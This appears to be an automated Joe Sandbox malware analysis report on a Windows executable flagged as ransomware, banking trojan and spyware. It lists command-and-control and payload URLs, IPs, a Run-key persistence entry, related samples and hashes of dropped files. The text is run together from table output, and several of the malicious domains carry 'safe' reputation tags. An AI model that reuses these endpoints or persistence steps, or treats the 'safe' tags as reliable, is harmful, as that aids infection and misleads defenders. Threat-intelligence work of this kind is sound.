                http://web.ad87h92j.com/4/long.bmpF0%Avira URL Cloudsafe
                http://api.jumpw.com/Announcement.html?gameid=&channel=Receive0%Avira URL Cloudsafe
                http://web.ad87h92j.com/4/long.bmpE=H0%Avira URL Cloudsafe
                https://mvc.withoutyou5.com/api.php/common/gettaskson0%Avira URL Cloudsafe
                https://mvc.withoutyou5.com/api.php/common/gettaskb0%Avira URL Cloudsafe
                https://mvc.withoutyou5.com:443/api.php/common/gettaskin0%Avira URL Cloudsafe
                https://mvc.withoutyou5.com/api.php/common/gettaskW0%Avira URL Cloudsafe
                https://support.ubi.com/0%Avira URL Cloudsafe
                http://sdk.jumpw.com/sdk/AdPodxt0%Avira URL Cloudsafe
                https://mvc.withoutyou5.com/60%Avira URL Cloudsafe
                http://web.ad87h92j.com/4/t.bmp0%Avira URL Cloudsafe
                http://www.astrolog.org/astrolog.htm0%Avira URL Cloudsafe
                http://www.gnu.org0%Avira URL Cloudsafe
                http://www.openssl.org/support/faq.html....................0%Avira URL Cloudsafe
                http://web.ad87h92j.com/4/d.bmpWhttp://web.ad87h92j.com/4/t.bmp0%Avira URL Cloudsafe
                https://mvc.withoutyou5.com/api.php/common/gettask4X0%Avira URL Cloudsafe
                https://mvc.withoutyou5.com/api.php/common/receivejson0%Avira URL Cloudsafe
                http://sdk.jumpw.com/sdk/AdPodxtbgImageCustombtnNumbtn%dXbtn%dYbtn%dImgbtn%dTipbtn%dUrlPrgBgImagePrg0%Avira URL Cloudsafe
                http://web.ad87h92j.com/4/long.bmp0%Avira URL Cloudsafe
                http://www.astrolog.org/astrolog.htmMain0%Avira URL Cloudsafe
                http://web.ad87h92j.com/4/d.bmp0%Avira URL Cloudsafe
                http://web.ad87h92j.com/4/text.bmp0%Avira URL Cloudsafe
                https://mvc.withoutyou5.com/-0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                mvc.withoutyou5.com
                104.26.7.127
                truefalse
                  unknown
                  cacer.goldenh0ur.com
                  104.21.17.45
                  truefalse
                    unknown
                    web.ad87h92j.com
                    188.114.96.3
                    truefalse
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      https://mvc.withoutyou5.com/api.php/common/gettaskfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://cacer.goldenh0ur.com/api.php/common/getdomainfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://mvc.withoutyou5.com/api.php/common/receivejsonfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://web.ad87h92j.com/4/long.bmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://laosiji.swjoy.com/client/api/3172/qr_code.dohttps://laosiji.swjoy.com/client/api/3524/qr_codpXm5oVO3Go.exefalse
                      • Avira URL Cloud: safe
                      unknown
                      https://mvc.withoutyou5.com/UDAPIjX8.exe, 00000009.00000002.3245993542.0000000001565000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://mvc.withoutyou5.com:443/api.php/common/gettask32=C:DAPIjX8.exe, 00000009.00000002.3245993542.000000000151E000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://mvc.withoutyou5.com/DAPIjX8.exe, 00000009.00000002.3245993542.0000000001565000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://laosiji.swjoy.com/client/api/3172/qr_code.dopXm5oVO3Go.exefalse
                      • Avira URL Cloud: safe
                      unknown
                      https:///api.php/common/gettask/api.php/common/getdomain.200idleActivityTimePlugingsleepDAPIjX8.exe, 00000009.00000002.3246679220.00000000032FE000.00000040.00000020.00020000.00000000.sdmp, DAPIjX8.exe, 00000009.00000002.3247531468.0000000010064000.00000002.00001000.00020000.00000000.sdmp, DAPIjX8.exe, 00000009.00000002.3246471111.00000000031D9000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://data.iana.org/time-zones/tz-link.htmlPostScriptpXm5oVO3Go.exe, 00000000.00000003.2577049291.0000000003C87000.00000004.00000020.00020000.00000000.sdmp, pXm5oVO3Go.exe, 00000000.00000003.2466007324.0000000010030000.00000004.00000020.00020000.00000000.sdmp, DAPIjX8.exe, 00000009.00000002.3247812700.000000006C6DD000.00000002.00000001.01000000.0000000B.sdmp, DAPIjX8.exe, 0000000A.00000002.2727092994.000000006C6DD000.00000002.00000001.01000000.0000000B.sdmp, DAPIjX8.exe, 0000000B.00000002.2807257535.000000006C6DD000.00000002.00000001.01000000.0000000B.sdmp, libcef.dll.0.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://mvc.withoutyou5.com/it$DAPIjX8.exe, 00000009.00000002.3245993542.0000000001565000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://mvc.withoutyou5.com/fmBDAPIjX8.exe, 00000009.00000002.3245993542.0000000001565000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://curl.haxx.se/docs/http-cookies.htmlpXm5oVO3Go.exefalse
                      • URL Reputation: safe
                      unknown
                      https://300.jumpw.com/Activity/cdn/300hero/tojmp/accesstojmp.jsonpXm5oVO3Go.exefalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.openssl.org/support/faq.htmlpXm5oVO3Go.exefalse
                      • URL Reputation: safe
                      unknown
                      https://passport.jumpw.com/OtherGameUserLogin/CheckGameLogin.jsp?co=10139.https://passport.jumpw.compXm5oVO3Go.exefalse
                      • Avira URL Cloud: safe
                      unknown
                      https://mvc.withoutyou5.com:443/api.php/common/gettaskDAPIjX8.exe, 00000009.00000002.3245993542.000000000151E000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://300.jumpw.com/Activity/cdn/300hero/tojmp/testtojmp.jsonpXm5oVO3Go.exefalse
                      • Avira URL Cloud: safe
                      unknown
                      http://web.ad87h92j.com/4/text.bmpC:pXm5oVO3Go.exe, 00000000.00000002.2608575327.0000000000CA9000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://laosiji.swjoy.com/client/api/3524/qr_code.dopXm5oVO3Go.exefalse
                      • Avira URL Cloud: safe
                      unknown
                      https://mvc.withoutyou5.com/dDAPIjX8.exe, 00000009.00000002.3245993542.0000000001565000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://api.jumpw.com/Announcement.html?gameid=pXm5oVO3Go.exefalse
                      • Avira URL Cloud: safe
                      unknown
                      http://web.ad87h92j.com/4/t.bmpPpXm5oVO3Go.exe, 00000000.00000002.2608012130.0000000000848000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.geonames.org/DAPIjX8.exe, DAPIjX8.exe, 0000000A.00000002.2727092994.000000006C6DD000.00000002.00000001.01000000.0000000B.sdmp, DAPIjX8.exe, 0000000B.00000002.2807257535.000000006C6DD000.00000002.00000001.01000000.0000000B.sdmp, libcef.dll.0.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://data.iana.org/time-zones/tz-link.htmlDAPIjX8.exe, DAPIjX8.exe, 0000000A.00000002.2727092994.000000006C6DD000.00000002.00000001.01000000.0000000B.sdmp, DAPIjX8.exe, 0000000B.00000002.2807257535.000000006C6DD000.00000002.00000001.01000000.0000000B.sdmp, libcef.dll.0.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.geonames.org/TimezonepXm5oVO3Go.exe, 00000000.00000003.2577049291.0000000003C87000.00000004.00000020.00020000.00000000.sdmp, pXm5oVO3Go.exe, 00000000.00000003.2466007324.0000000010030000.00000004.00000020.00020000.00000000.sdmp, DAPIjX8.exe, 00000009.00000002.3247812700.000000006C6DD000.00000002.00000001.01000000.0000000B.sdmp, DAPIjX8.exe, 0000000A.00000002.2727092994.000000006C6DD000.00000002.00000001.01000000.0000000B.sdmp, DAPIjX8.exe, 0000000B.00000002.2807257535.000000006C6DD000.00000002.00000001.01000000.0000000B.sdmp, libcef.dll.0.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://web.ad87h92j.com/4/t.bmpmppXm5oVO3Go.exe, 00000000.00000002.2608575327.0000000000CA9000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.astro.com/swisseph.libcef.dll.0.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://support.ubi.com/?GenomeId=954e66a0-be1b-4aa0-9690-fb75201e4e9epidRequiredDAPIjX8.exe, 00000009.00000002.3244823714.00000000007F3000.00000002.00000001.01000000.0000000A.sdmp, DAPIjX8.exe, 0000000A.00000002.2726111306.00000000007F3000.00000002.00000001.01000000.0000000A.sdmp, DAPIjX8.exe, 0000000B.00000002.2806197060.00000000007F3000.00000002.00000001.01000000.0000000A.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://web.ad87h92j.com/4/long.bmpFpXm5oVO3Go.exe, 00000000.00000002.2608012130.000000000081B000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://api.jumpw.com/Announcement.html?gameid=&channel=ReceivepXm5oVO3Go.exefalse
                      • Avira URL Cloud: safe
                      unknown
                      http://web.ad87h92j.com/4/long.bmpE=HpXm5oVO3Go.exe, 00000000.00000002.2608012130.000000000081B000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://mvc.withoutyou5.com/api.php/common/gettasksonDAPIjX8.exe, 00000009.00000003.2650399121.00000000015DE000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://mvc.withoutyou5.com/api.php/common/gettaskbDAPIjX8.exe, 00000009.00000002.3245993542.0000000001579000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://mvc.withoutyou5.com:443/api.php/common/gettaskinDAPIjX8.exe, 00000009.00000002.3245993542.000000000151E000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://mvc.withoutyou5.com/api.php/common/gettaskWDAPIjX8.exe, 00000009.00000002.3245993542.0000000001579000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://sdk.jumpw.com/sdk/AdPodxtpXm5oVO3Go.exefalse
                      • Avira URL Cloud: safe
                      unknown
                      https://support.ubi.com/DAPIjX8.exe, 00000009.00000002.3244823714.00000000007F3000.00000002.00000001.01000000.0000000A.sdmp, DAPIjX8.exe, 0000000A.00000002.2726111306.00000000007F3000.00000002.00000001.01000000.0000000A.sdmp, DAPIjX8.exe, 0000000B.00000002.2806197060.00000000007F3000.00000002.00000001.01000000.0000000A.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://web.ad87h92j.com/4/t.bmppXm5oVO3Go.exe, 00000000.00000002.2608012130.0000000000848000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.astrolog.org/astrolog.htmDAPIjX8.exe, DAPIjX8.exe, 0000000A.00000002.2727092994.000000006C6DD000.00000002.00000001.01000000.0000000B.sdmp, DAPIjX8.exe, 0000000B.00000002.2807257535.000000006C6DD000.00000002.00000001.01000000.0000000B.sdmp, libcef.dll.0.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://mvc.withoutyou5.com/6DAPIjX8.exe, 00000009.00000002.3245993542.0000000001565000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.openssl.org/support/faq.html....................pXm5oVO3Go.exefalse
                      • Avira URL Cloud: safe
                      unknown
                      http://web.ad87h92j.com/4/d.bmpWhttp://web.ad87h92j.com/4/t.bmppXm5oVO3Go.exe, 00000000.00000002.2608575327.0000000000CA9000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.gnu.orglibcef.dll.0.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://mvc.withoutyou5.com/api.php/common/gettask4XDAPIjX8.exe, 00000009.00000003.2743921387.0000000001603000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://sdk.jumpw.com/sdk/AdPodxtbgImageCustombtnNumbtn%dXbtn%dYbtn%dImgbtn%dTipbtn%dUrlPrgBgImagePrgpXm5oVO3Go.exefalse
                      • Avira URL Cloud: safe
                      unknown
                      http://web.ad87h92j.com/4/text.bmppXm5oVO3Go.exe, 00000000.00000003.2404109033.000000000086F000.00000004.00000020.00020000.00000000.sdmp, pXm5oVO3Go.exe, 00000000.00000003.2404040552.000000000086E000.00000004.00000020.00020000.00000000.sdmp, pXm5oVO3Go.exe, 00000000.00000003.2425205703.000000000086F000.00000004.00000020.00020000.00000000.sdmp, pXm5oVO3Go.exe, 00000000.00000003.2425129747.000000000086E000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://web.ad87h92j.com/4/d.bmppXm5oVO3Go.exe, 00000000.00000003.2425129747.0000000000866000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.astrolog.org/astrolog.htmMainpXm5oVO3Go.exe, 00000000.00000003.2577049291.0000000003C87000.00000004.00000020.00020000.00000000.sdmp, pXm5oVO3Go.exe, 00000000.00000003.2466007324.0000000010030000.00000004.00000020.00020000.00000000.sdmp, DAPIjX8.exe, 00000009.00000002.3247812700.000000006C6DD000.00000002.00000001.01000000.0000000B.sdmp, DAPIjX8.exe, 0000000A.00000002.2727092994.000000006C6DD000.00000002.00000001.01000000.0000000B.sdmp, DAPIjX8.exe, 0000000B.00000002.2807257535.000000006C6DD000.00000002.00000001.01000000.0000000B.sdmp, libcef.dll.0.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://mvc.withoutyou5.com/-DAPIjX8.exe, 00000009.00000002.3245993542.0000000001565000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      104.26.7.127
                      mvc.withoutyou5.comUnited States
                      13335CLOUDFLARENETUSfalse
                      104.21.17.45
                      cacer.goldenh0ur.comUnited States
                      13335CLOUDFLARENETUSfalse
                      188.114.96.3
                      web.ad87h92j.comEuropean Union
                      13335CLOUDFLARENETUSfalse
                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1499614
                      Start date and time:2024-08-27 09:47:06 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 9m 2s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Run name:Run with higher sleep bypass
                      Number of analysed new started processes analysed:12
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:pXm5oVO3Go.exe
                      renamed because original name is a hash value
                      Original Sample Name:d863d9572524236e97528275899b73ffe7f182b4824bd7efc12a2e8ae3e8955e.exe
                      Detection:MAL
                      Classification:mal100.rans.bank.troj.spyw.evad.winEXE@6/8@3/3
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 85%
                      • Number of executed functions: 73
                      • Number of non-executed functions: 274
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report creation exceeded maximum time and may have missing disassembly code information.
                      • Report size exceeded maximum capacity and may have missing disassembly code.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      TimeTypeDescription
                      09:50:03AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WINDOWS C:\Program Files (x86)\6fjdie\DAPIjX8.exe
                      09:50:11AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WINDOWS C:\Program Files (x86)\6fjdie\DAPIjX8.exe
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      188.114.96.3QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                      • filetransfer.io/data-package/0U9QqTZ6/download
                      FedEx Shipping Document.scr.exeGet hashmaliciousAzorultBrowse
                      • l0h5.shop/CM341/index.php
                      Quote 1T PN40 082624.exeGet hashmaliciousFormBookBrowse
                      • www.lampgm.pro/em9t/
                      weave.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                      • 671893cm.n9shka.top/eternalpipeLowProcessDbDatalifewpPublicCdn.php
                      steam_module_x64.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                      • 671893cm.n9shka.top/eternalpipeLowProcessDbDatalifewpPublicCdn.php
                      http://y8oj.tonetrau.comGet hashmaliciousUnknownBrowse
                      • y8oj.tonetrau.com/
                      Bonelessness.exeGet hashmaliciousSimda StealerBrowse
                      • qegyhig.com/login.php
                      roundwood.exeGet hashmaliciousSimda StealerBrowse
                      • lysyvan.com/login.php
                      http://www.pro-pharma.co.ukGet hashmaliciousUnknownBrowse
                      • proph.co.uk/blog/
                      7aHn0kxDWZ.exeGet hashmaliciousXmrigBrowse
                      • joxi.net/4Ak49WQH0GE3Nr.mp3
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      web.ad87h92j.comnOyswc9ly2.dllGet hashmaliciousUnknownBrowse
                      • 188.114.97.3
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      CLOUDFLARENETUSCMB Monaco Signatures Consent Docs#299229(Revised).pdfGet hashmaliciousUnknownBrowse
                      • 104.18.95.41
                      nOyswc9ly2.dllGet hashmaliciousUnknownBrowse
                      • 188.114.97.3
                      SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exeGet hashmaliciousUnknownBrowse
                      • 104.20.23.46
                      https://docs.google.com/presentation/d/1p772m5RM1IL7T2czRhP4f72F4IrvoiS4-fTTq6BpzJg/pub?start=false&loop=false&delayms=3000Get hashmaliciousUnknownBrowse
                      • 188.114.96.3
                      SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exeGet hashmaliciousUnknownBrowse
                      • 104.20.23.46
                      file.exeGet hashmaliciousUnknownBrowse
                      • 172.64.41.3
                      Feature Status Update D583R.htmlGet hashmaliciousUnknownBrowse
                      • 188.114.96.3
                      GP Design INV20230103 $68,320.exeGet hashmaliciousUnknownBrowse
                      • 188.114.97.3
                      Quotation-27-08-24.exeGet hashmaliciousFormBookBrowse
                      • 172.67.220.161
                      Electronic_Receipt_ATT0001.htmGet hashmaliciousUnknownBrowse
                      • 188.114.96.3
                      CLOUDFLARENETUSCMB Monaco Signatures Consent Docs#299229(Revised).pdfGet hashmaliciousUnknownBrowse
                      • 104.18.95.41
                      nOyswc9ly2.dllGet hashmaliciousUnknownBrowse
                      • 188.114.97.3
                      SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exeGet hashmaliciousUnknownBrowse
                      • 104.20.23.46
                      https://docs.google.com/presentation/d/1p772m5RM1IL7T2czRhP4f72F4IrvoiS4-fTTq6BpzJg/pub?start=false&loop=false&delayms=3000Get hashmaliciousUnknownBrowse
                      • 188.114.96.3
                      SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exeGet hashmaliciousUnknownBrowse
                      • 104.20.23.46
                      file.exeGet hashmaliciousUnknownBrowse
                      • 172.64.41.3
                      Feature Status Update D583R.htmlGet hashmaliciousUnknownBrowse
                      • 188.114.96.3
                      GP Design INV20230103 $68,320.exeGet hashmaliciousUnknownBrowse
                      • 188.114.97.3
                      Quotation-27-08-24.exeGet hashmaliciousFormBookBrowse
                      • 172.67.220.161
                      Electronic_Receipt_ATT0001.htmGet hashmaliciousUnknownBrowse
                      • 188.114.96.3
                      CLOUDFLARENETUSCMB Monaco Signatures Consent Docs#299229(Revised).pdfGet hashmaliciousUnknownBrowse
                      • 104.18.95.41
                      nOyswc9ly2.dllGet hashmaliciousUnknownBrowse
                      • 188.114.97.3
                      SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exeGet hashmaliciousUnknownBrowse
                      • 104.20.23.46
                      https://docs.google.com/presentation/d/1p772m5RM1IL7T2czRhP4f72F4IrvoiS4-fTTq6BpzJg/pub?start=false&loop=false&delayms=3000Get hashmaliciousUnknownBrowse
                      • 188.114.96.3
                      SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exeGet hashmaliciousUnknownBrowse
                      • 104.20.23.46
                      file.exeGet hashmaliciousUnknownBrowse
                      • 172.64.41.3
                      Feature Status Update D583R.htmlGet hashmaliciousUnknownBrowse
                      • 188.114.96.3
                      GP Design INV20230103 $68,320.exeGet hashmaliciousUnknownBrowse
                      • 188.114.97.3
                      Quotation-27-08-24.exeGet hashmaliciousFormBookBrowse
                      • 172.67.220.161
                      Electronic_Receipt_ATT0001.htmGet hashmaliciousUnknownBrowse
                      • 188.114.96.3
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      a0e9f5d64349fb13191bc781f81f42e1Pago pendientes.xlsGet hashmaliciousHTMLPhisherBrowse
                      • 104.26.7.127
                      • 104.21.17.45
                      French Group.jsGet hashmaliciousRemcosBrowse
                      • 104.26.7.127
                      • 104.21.17.45
                      NwFP.exeGet hashmaliciousSmokeLoaderBrowse
                      • 104.26.7.127
                      • 104.21.17.45
                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                      • 104.26.7.127
                      • 104.21.17.45
                      file.exeGet hashmaliciousLummaC, VidarBrowse
                      • 104.26.7.127
                      • 104.21.17.45
                      Mi_Documento.jsGet hashmaliciousAsyncRAT, DcRatBrowse
                      • 104.26.7.127
                      • 104.21.17.45
                      French Group.jsGet hashmaliciousUnknownBrowse
                      • 104.26.7.127
                      • 104.21.17.45
                      SecuriteInfo.com.Riskware.2144FlashPlayer.13074.5713.exeGet hashmaliciousUnknownBrowse
                      • 104.26.7.127
                      • 104.21.17.45
                      SecuriteInfo.com.Riskware.2144FlashPlayer.13074.5713.exeGet hashmaliciousUnknownBrowse
                      • 104.26.7.127
                      • 104.21.17.45
                      6rfHnQpz6K.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                      • 104.26.7.127
                      • 104.21.17.45
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      C:\Program Files (x86)\6fjdie\VCRUNTIME140.dllnOyswc9ly2.dllGet hashmaliciousUnknownBrowse
                        C:\Program Files (x86)\6fjdie\DAPIjX8.exenOyswc9ly2.dllGet hashmaliciousUnknownBrowse
                          C:\Program Files (x86)\6fjdie\libcef.dllnOyswc9ly2.dllGet hashmaliciousUnknownBrowse
                            C:\Program Files (x86)\6fjdie\MSVCP140.dllnOyswc9ly2.dllGet hashmaliciousUnknownBrowse
                              https://downloads.linktek.com/LR/SetupLinkReporter.zipGet hashmaliciousUnknownBrowse
                                Process:C:\Users\user\Desktop\pXm5oVO3Go.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):6453568
                                Entropy (8bit):7.944493660771585
                                Encrypted:false
                                SSDEEP:196608:fW1Hje3HvntQwZSPyl7N6nds1HhmwcOaXr:myvtrxBL1QSaXr
                                MD5:C8E8EEAF5464AF1A188B3DC12C890813
                                SHA1:2DF041366B9DE8A2B982205B15F7264145E81644
                                SHA-256:E528455778D952ACFC5B330B378F2C53CC92E55CFEAB1C1E1DBB52E01D626BB4
                                SHA-512:8119BD5A7FE790F1EBF1B2C5411264C32A193718851746C26183B8A48293D61E8F9F3EEB97CC851A419B5B41038BC63BFFD17E99907AD4F8CDEE63F7151DBE46
                                Malicious:true
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Joe Sandbox View:
                                • Filename: nOyswc9ly2.dll, Detection: malicious, Browse
                                Reputation:low
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....f...............'..?.................0?...@..........................@.......kc.....................................`........0..u............Pb.@)..................................d.}.........@.............{..............................text...R.?......................... ..`.rdata.......0?.....................@..@.data...T.....H.....................@....idata...Q....J.....................@..@.tls......... K.....................@....00cfg.......0K.....................@..@.ubx0...z....@K.....................`..`.ubx1...`A_...y..B_.................`..`.rsrc...u....0.......J_.............@..@........................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\Desktop\pXm5oVO3Go.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):436600
                                Entropy (8bit):6.647460578716755
                                Encrypted:false
                                SSDEEP:12288:mgU0BGzePo6+J+4P0xYv7IQgihUgiW6QR7t5s03Ooc8dHkC2esMoWKl:I01Po6+J+dxYv7IQgR03Ooc8dHkC2e50
                                MD5:C092885EA11BD80D35CB55C7D488F1E2
                                SHA1:BFE2F5141AF49724A54C838B9A9CB6E54C4A6AA5
                                SHA-256:885A0A146A83B0D5A19B88C4EB6372B648CFAED817BD31D8CD3FB91313DEA13D
                                SHA-512:8A600CCF97A6D5201BB791A43F16CD4CCD19A8E9DECAE79B8BA3E5200B6E8936649626112B1C6BDB1465AB8AFB395803A68286C76B817245C6077D0536D03344
                                Malicious:true
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Joe Sandbox View:
                                • Filename: nOyswc9ly2.dll, Detection: malicious, Browse
                                • Filename: , Detection: malicious, Browse
                                Reputation:moderate, very likely benign file
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p.. 4.os4.os4.os..nr6.os=..s".os4.ns..osf.nr7.osf.kr?.osf.lr<.osf.jr..osf.or5.osf.s5.osf.mr5.osRich4.os........................PE..L...J(.`.........."!.........~...............0.......................................r....@A.........................T......<c..........................x#.......6...W..8............................W..@............`..8............................text...b........................... ..`.data...L(...0......................@....idata.......`.......2..............@..@.rsrc................J..............@..@.reloc...6.......8...N..............@..B........................................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\Desktop\pXm5oVO3Go.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):79792
                                Entropy (8bit):6.778797048504205
                                Encrypted:false
                                SSDEEP:1536:hExZIDobDaHrrAPsCbU4qzBHXpHolecbGpJGBNzZz3:yZPDaHrrobUHzDQecbGbGN
                                MD5:9D5A742F221C4929A178BAF2B93FC7FB
                                SHA1:928C9E0E1C18EC474C2F450CA00A154E44AC547A
                                SHA-256:F10727074BCB4375F276E48DA64029D370299768536157321FB4BD9B1997B898
                                SHA-512:F4614962C67BB41B8A2FB17E3112745F4BA012BBF382C1CC7DEACD6C8525A53D75890A2EB46F0DA61BFA054DC52505B09A29291D5FA1C25C6201A66B9DC4B547
                                Malicious:true
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Joe Sandbox View:
                                • Filename: nOyswc9ly2.dll, Detection: malicious, Browse
                                Reputation:low
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........M...M...M.....O...D...F...M...d.../..Y.../..X.../..Q.../..L.../.u.L.../..L...RichM...........PE..L...19............"!.........................................................P............@A........................P........ .......0...................'...@......x$..T............................#..@............ ...............................text...d........................... ..`.data...............................@....idata....... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\Desktop\pXm5oVO3Go.exe
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):524288000
                                Entropy (8bit):0.03653807951946192
                                Encrypted:false
                                SSDEEP:
                                MD5:D951A61C56A005A8415DC86758E08557
                                SHA1:A94BE1A3E166FCCADEC300885B0B923735DA7596
                                SHA-256:DCD188D383CB6347BFED0F4E6209ABD579526E729B003C31C3A8B117C1475AF6
                                SHA-512:D63B9887F945F6ABDAEA2FE297507AB9E1A84B10864C8AE454E8E3714C77C19131614FDD6DEAB85CA9950A6227D5559FF1002869FDCE63C9DFDDA7998BB22188
                                Malicious:true
                                Joe Sandbox View:
                                • Filename: nOyswc9ly2.dll, Detection: malicious, Browse
                                Reputation:low
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A..........4.......!..........)......9.......c.........1.....0.....7....Rich...........PE..L...5..f...........!.........0......$].......................................0............@.........................pI......t6.......0..X....................@..l...................................X(..@............................................text...!........................... ..`.rdata..Z...........................@..@.data.......p.......T..............@....rsrc...X....0......................@..@.reloc..V....@......................@..B........................................................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\Desktop\pXm5oVO3Go.exe
                                File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                Category:dropped
